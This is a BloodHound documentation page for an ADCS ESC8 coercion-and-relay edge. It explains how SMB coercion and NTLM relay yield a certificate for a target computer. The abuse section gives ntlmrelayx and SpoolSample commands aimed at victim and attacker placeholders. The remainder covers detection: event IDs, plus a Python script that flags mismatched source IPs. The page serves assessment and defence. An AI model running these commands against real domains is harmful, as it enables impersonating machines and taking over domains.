Applies to BloodHound Enterprise and CE

This edge indicates that an attacker with “Authenticated Users” access can trigger SMB-based coercion from the target computer to their attacker-controlled host via NTLM. The authentication attempt from the target computer can then be relayed to an ESC8-vulnerable web enrollment endpoint of an Active Directory Certificate Services (ADCS) enterprise CA server. This allows the attacker to obtain a certificate enabling domain authentication as the target computer.

Abuse Info

This section provides general guidance about abusing this edge. For detailed instructions, see references at the end of this article.

Linux

  1. Start the Relay Server: The NTLM relay can be executed with ntlmrelayx.py. To relay to the enterprise CA and enroll a certificate, specify the HTTP(S) endpoint as the target and use the following arguments:
    impacket-ntlmrelayx -t {Target} --adcs --template {Template Name} -smb2support
    
  2. Coerce the Target Computer: Several coercion methods are documented here: Windows Coerced Authentication Methods. Examples of tools include: To trigger WebClient coercion (instead of regular SMB coercion), the listener must use a WebDAV Connection String format: \\SERVER_NETBIOS@PORT/PATH/TO/FILE.

Windows

  1. Start the Relay Server: The NTLM relay can be executed with Inveigh.
  2. Coerce the Target Computer: Several coercion methods are documented here: Windows Coerced Authentication Methods. Examples of tools include: To trigger WebClient coercion (instead of regular SMB coercion), the listener must use a WebDAV Connection String format: \\SERVER_NETBIOS@PORT/PATH/TO/FILE.
    SpoolSample.exe "VICTIM_IP" "ATTACKER_NETBIOS@PORT/file.txt"
    

Opsec Considerations

Detection of NTLM Relay

NTLM relayed authentications can be detected by logon events where the source IP address does not match the IP address the authenticating computer actually uses. This detection technique is described in the Detecting NTLM Relay Attacks blog post.

Detection of Certificate Usage

Authentication using the obtained certificate is another detection opportunity. If Kerberos authentication is used, a domain controller will generate Windows Event ID 4768 (“A Kerberos authentication ticket (TGT) was requested”). This event will include the attacker’s IP address rather than the target computer’s IP address. Similarly, for Schannel authentication, Event ID 4624 will reveal the incorrect IP address. These detection techniques are described in detail under DETECT2 in the Certified Pre-Owned whitepaper.
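Both detection opportunities above (the relayed NTLM logon and the later use of the certificate) come down to the same check: the source IP in a domain controller event for a machine account differs from the IP that computer is known to use. The following is an added example, not code from BloodHound or the referenced blog post and whitepaper, that runs that check over constructed 4624 and 4768 event records; the host inventory, the sample events, and the reading of pre-authentication type 16 as certificate (PKINIT) based are assumptions made for the example.

```python
import ipaddress
from typing import Optional

# Constructed inventory mapping machine accounts to the IP each computer is
# known to use (assumption: sourced from DHCP leases, DNS, or an asset database).
HOST_INVENTORY = {
    "WS01$": "10.0.10.21",
    "FS02$": "10.0.10.35",
}

# Constructed sample events using the field names found in Security log XML for
# 4624 (logon) and 4768 (TGT requested). Two are benign; two carry a source IP
# that belongs to some other host, as a relayed NTLM logon or a PKINIT TGT
# request made with a relayed certificate would.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "WS01$", "IpAddress": "10.0.10.21",
     "LogonType": 3, "AuthenticationPackageName": "NTLM"},
    {"EventID": 4624, "TargetUserName": "WS01$", "IpAddress": "10.0.10.99",
     "LogonType": 3, "AuthenticationPackageName": "NTLM"},
    {"EventID": 4768, "TargetUserName": "FS02$", "IpAddress": "::ffff:10.0.10.35",
     "PreAuthType": "16"},
    {"EventID": 4768, "TargetUserName": "FS02$", "IpAddress": "::ffff:10.0.10.99",
     "PreAuthType": "16"},
    # A local logon (no source IP) and an account missing from the inventory:
    # neither can be compared, so neither is flagged.
    {"EventID": 4624, "TargetUserName": "WS01$", "IpAddress": "-",
     "LogonType": 5, "AuthenticationPackageName": "Negotiate"},
    {"EventID": 4768, "TargetUserName": "PRINT07$", "IpAddress": "::ffff:10.0.10.77",
     "PreAuthType": "2"},
]


def normalize_ip(raw: str) -> Optional[str]:
    """Return a plain IPv4/IPv6 string, unwrapping the ::ffff: form that 4768
    records use; return None for placeholders ('-', loopback) with no source."""
    try:
        addr = ipaddress.ip_address(raw)
    except ValueError:
        return None  # '-' or empty: the event carries no network source
    if addr.is_loopback:
        return None
    if addr.version == 6 and addr.ipv4_mapped is not None:
        return str(addr.ipv4_mapped)
    return str(addr)


def find_mismatches(events, inventory):
    """Flag 4624/4768 events where a machine account authenticates from an IP
    other than the one the inventory says that computer uses."""
    findings = []
    for ev in events:
        event_id = ev.get("EventID")
        if event_id not in (4624, 4768):
            continue
        account = ev.get("TargetUserName", "")
        # Only machine accounts with a known address can be compared.
        if not account.endswith("$") or account not in inventory:
            continue
        src = normalize_ip(ev.get("IpAddress", "-"))
        if src is None:
            continue
        expected = inventory[account]
        if src == expected:
            continue
        if event_id == 4624:
            reason = f"{ev.get('AuthenticationPackageName')} network logon"
        elif ev.get("PreAuthType") == "16":
            # Assumption for this example: type 16 = PA-PK-AS-REQ (PKINIT).
            reason = "certificate (PKINIT) TGT request"
        else:
            reason = "TGT request"
        findings.append({
            "event_id": event_id,
            "account": account,
            "expected_ip": expected,
            "source_ip": src,
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in find_mismatches(SAMPLE_EVENTS, HOST_INVENTORY):
        print(f"[{f['event_id']}] {f['account']}: {f['reason']} from "
              f"{f['source_ip']} (expected {f['expected_ip']})")
```

The inventory lookup is where a real deployment does its work: the check is only as good as the mapping from machine account to current address, so it should be refreshed from DHCP or DNS rather than kept static, and multi-homed or roaming computers need a set of addresses rather than one.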

Edge Schema

Source: Authenticated Users, Group
Destination: Computer
Traversable: Yes

References